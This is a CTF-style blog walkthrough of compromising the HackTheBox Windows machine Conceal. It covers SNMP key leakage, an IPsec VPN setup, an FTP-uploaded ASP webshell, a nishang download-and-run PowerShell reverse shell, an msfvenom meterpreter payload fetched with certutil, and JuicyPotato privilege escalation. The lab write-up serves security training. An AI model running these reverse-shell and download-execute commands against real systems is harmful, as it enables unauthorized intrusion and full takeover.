Conceal HackTheBox WalkThrough

Conceal HackTheBox walkthrough

This is Conceal HackTheBox machine walkthrough and is also the 23rd machine of our OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to Conceal HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a Windows OS machine with IP address 10.10.10.116 and difficulty hard assigned by its maker.

Since this machine is retired so you will require VIP subscription at hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.116. If all goes correct then start hacking. As usual I started by scanning the machine. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-

Scanning

When I tried to perform Stealth Scan (-sS) of all the ports it found no port as open because firewall is configured on each TCP ports and hence blocks scanning. Then I performed full UDP Scan (-sU) and it found two ports as open and that too under 1000 ports.

$ sudo nmap -sU -sV -T4 -p1-1000 10.10.10.116

UDP scan in Conceal HackTheBox walkthrough

Nmap found UDP ports 161 and 500 as open. SNMP Server is running on port 161 and ISAKMP is running over port 500. Let us run default script (-sC) of nmap over these ports and see what it can find.

$ sudo nmap -sU -sC -T4 -p 500,161 10.10.10.116

UDP Scan with Default script
————————Snip————————
UDP Scan with Default script 1

Nmap scan with default script revealed a lot of useful information. snmp-netstat script revealed that many number of TCP ports are listening. Also ike-version script revealed conceal OS as Windows Server 8. Since port 500 is open and IKE VPN server is running over it we can connect to all the listening port only after connecting with IKE VPN. So let us enumerate more on these ports so that we can get some information for our VPN configuration file.

Now our next step is to enumerate on these two ports and gather as much information as we can. If you want to get more information like number of users & their names, exact OS version and services information on conceal machine you can run the following nmap commands with the attached scripts. These command will execute all snmp and ike scripts which is present in directory /usr/share/nmap/scripts/ on ports 161 and 500 respectively.

$ sudo nmap -sU -p161 --script snmp* 10.10.10.116

$ sudo nmap -sU -p500 --script ike* 10.10.10.116

We have got information about different ports and services running over them. Now let us use some service specific tool to enumerate more on these ports. For SNMP enumeration I have used snmp-check.pl (Perl script to perform SNMP enum). Simply copy the content from here and save in a file snmp-check.pl and run as given below. You can also use Kali built-in tool $snmpwalk for this purpose. But snmp-check.pl give information in more human readable form. I have used both the tools to show you the result.

SNMP Enumeration ~ 161

$ snmpwalk -v 2c -c public 10.10.10.116

snmpwalk result  in Conceal HackTheBox walkthrough
————————Snip————————

$ vi snmp-check.pl

$ perl snmp-check.pl -t 10.10.10.116 -p 161

snmp-check result in conceal htb
————————Snip————————

Both the tools have found IKE VPN password PSK Key. When I tried to crack this hash on crackstation.net I got the password Dudecake1!.

IKE VPN password PSK – 9C8B1A372B1878851BE2C097031B6E43: Dudecake1!

Cracking IKE VPN password on crackstation.net

IPsec Enumeration ~ 500

$ike-scan on port 500 revealed that IKE version is v1, authentication is using Pre Shared Key and encryption is 3DES. All these information is useful for making a VPN configuration file.

$ sudo ike-scan -M 10.10.10.116

IKE-Scan result on conceal

I am going to use $strongswan VPN client to connect with the VPN Server running on conceal machine.

$ sudo apt install strongswan # to install on your Kali machine

You will also need to install these additional plugins

$ sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins

Once we have installed them successfully let us edit our VPN configuration file. Since we are going to use IPsec protocol to connect using VPN so we will need to edit the configuration file of IPsec. IPsec configuration file is located in /etc/ directory. Simply put the following code in ipsec.conf file. Make sure to replace left=10.10.14.9 with your tun0 IP.

$ tail -16 /etc/ipsec.conf

config setupcharondebug="all"uniqueids=yesstrictcrlpolicy=noconn concealauthby=secretauto=addike=3des-sha1-modp1024!esp=3des-sha1!type=transportkeyexchange=ikev1left=10.10.14.9right=10.10.10.116rightsubnet=10.10.10.116[tcp]

Also put the following information in the ipsec.secrets file after changing 10.10.14.9 with your tun0 IP.

$ sudo head -3 /etc/ipsec.secrets

# This file holds shared secrets or RSA private keys for authentication.10.10.14.9 10.10.10.116: PSK "Dudecake1!"# RSA private key for this host, authenticating it to any other host

$ tail -16 /etc/ipsec.conf

$ sudo head -3 /etc/ipsec.secrets

IPsec configuration file in Conceal HackTheBox walkthrough

For more information on VPN file configuration of IPsec protocol check this link. Let us connect to VPN.

Connecting with IPsec VPN

$ sudo ipsec restart

$ sudo ipsec up conceal

$ sudo ipsec status

Connecting to IKE VPN server using IPSec VPN configuration file

We are connected to IPsec VPN. Let us again perform Nmap scan to check which port is open.

$ sudo nmap -sC -sV -sT -oA nmap/tcp_scan 10.10.10.116

TCP scan during Conceal HackTheBox walkthrough

Nmap found ports 21, 80, 135, 139 and 445 as open. Microsoft ftpd server is running over port 21 and ftp-anon script revealed that anonymous login is allowed. Then immediately I tried to login into it by credential anonymous: anonymous. After some enumeration found that we can upload file to this server. To test this I created a simple txt file test.txt and uploaded it. Then tried to access the file at URL http://10.10.10.116/test.txt.

We can’t access the file, there may be chances that this file would be uploaded to some other folder. For knowing this I performed directory bruteforcing using tool $dirsearch and wordlist small.txt. small.txt is present in the directory /usr/share/wordlists/dirb/ of Kali/Parrot.

Conceal Webpage

$ sudo dirsearch -w /usr/share/wordlists/dirb/small.txt -u http://10.10.10.116/ -e all -t 40 | tee dirsearch.out

Directory bruteforcing in conceal hackthebox machine during walkthrough

Directory bruteforcing found a folder upload and our uploaded file is present in this folder. So the URL where we can access our uploaded file is http://10.10.10.116/upload/test.txt.

Now my next step is to upload webshell so that we can execute command on conceal machine and can get a reverse shell back on our Kali machine. Since it is an IIS server so I tried to upload aspx and asp webshell because these files are mostly supported by IIS server. When I uploaded a webshell of aspx extension it didn’t execute because aspx extension is blocked on server. But when I uploaded asp webshell and run it in browser it is easily executed and we can now execute OS command through it. The link of webshell is this.

Login into FTP & Uploading Webshell

$ ftp 10.10.10.116

~anonymous

~anonymous

$ put webshell.asp

Uploading asp webshell through ftp client

After uploading access the webshell at http://10.10.10.116/upload/webshell.asp.

$ ipconfig

Remote code Execution on conceal Hackthebox machine

We have got Remote Code Execution on conceal. Let us upgrade this shell to an Interactive PowerShell so that we can access to conceal machine using command prompt. For this I am using nishang’s Invoke-PowerShellTcp.ps1 script. The repository link for nishang is this. First of all clone the repository to your /opt folder then copy the file Invoke-PowerShellTcp.ps1 to a new file nishang.ps1 in current directory and add Invoke-PowerShellTcp -Reverse –IPAddress 10.10.14.9 -Port 4321 at the bottom of nishang.ps1 file. Now start python3 web server in the same folder to host this file. And in other window start netcat listener on port 4321.

$ sudo git clone https://github.com/samratashok/nishang

$ cd /home/deepak/HTB/Boxes/Conceal

$ cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1

$ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321' >> nishang.ps1

$ sudo python3 -m http.server 80

Now run

powershell "IEX(New-Object Net.webClient).downloadString('http://10.10.14.9/nishang.ps1')"

in the webshell or alternatively go to URL

http://10.10.10.116/upload/webshell.asp?cmd=powershell+%22IEX(New-Object+Net.webClient).downloadString(%27http%3A%2F%2F10.10.14.9%2Fnishang.ps1%27)%22  to download nishang.ps1 and execute it on conceal machine.

$ nc -nvlp 4321

$ whoami

Getting User shell in Conceal htb

We have got Integrative PowerShell with user destitute privilege. Let us capture user flag.

Capture User Flag

$ type C:\Users\Destitute\Desktop\proof.txt

Capturing user flag in conceal HTB machine

Privilege Escalation

To escalate the privilege to admin we have to first find a privilege escalation vector using which we can perform privilege escalation.

Finding PrivEsc Vector

$ whoami /priv command found token SeImpersonatePrivilege is enabled. This is actually a vulnerability and can be exploited by Juicy Potato exploit. For more info about this vulnerability check this link and juicy potato link is this. The link of JuicyPotato.exe binary is this. When I exploited this machine using Juicy Potato exploit I could easily got admin shell. So here our potential PrivEsc vector is Privilege Escalation through Access Token Manipulation. Check here hackthebox machine with similar PrivEsc Vector.

Finding PrivEsc vector in Conceal HTB

To exploit this vulnerability we will require a program that will be executed when we run juicy potato exploit. For this I have created shell.exe file through $msfvenom that will give us shell on $msfconsole. So create shell.exe using $msfvenom and send it to conceal machine.

Creating & Uploading Shell

On Kali Machine

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.9 LPORT=4567 --arch x64 -f exe > shell.exe

$ python3 -m http.server 8000

On Conceal Machine

$ cd C:\Users\Destitute

$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/shell.exe" "shell.exe"

$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/JuicyPotato.exe" "JuicyPotato.exe"

Downloading malware in Conceal Machine

We have successfully downloaded both the binaries to conceal machine. Let us get admin shell by exploiting the vulnerability.

Getting Admin Shell

On Kali Machine

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set LHOST 10.10.14.9

msf6 exploit(multi/handler) > set LPORT 4567

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp

msf6 exploit(multi/handler) > exploit

meterpreter > getuid

meterpreter > sysinfo

On Conceal Machine

$ & "C:\Users\Destitute\JuicyPotato.exe" -l 1337 -p "C:\Users\Destitute\shell.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Getting root shell during Conceal Hackthebox walkthrough

We are NT AUTHORITY\SYSTEM now. It is the highest privilege in windows OS. Let us capture root flag from Admin directory.

Capture Root Flag

meterpreter > search -f proof.txt "C:\Users"

meterpreter > cat "c:\Users\Administrator\Desktop\proof.txt"

Capture root flag in conceal htb

This was how I rooted Conceal HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/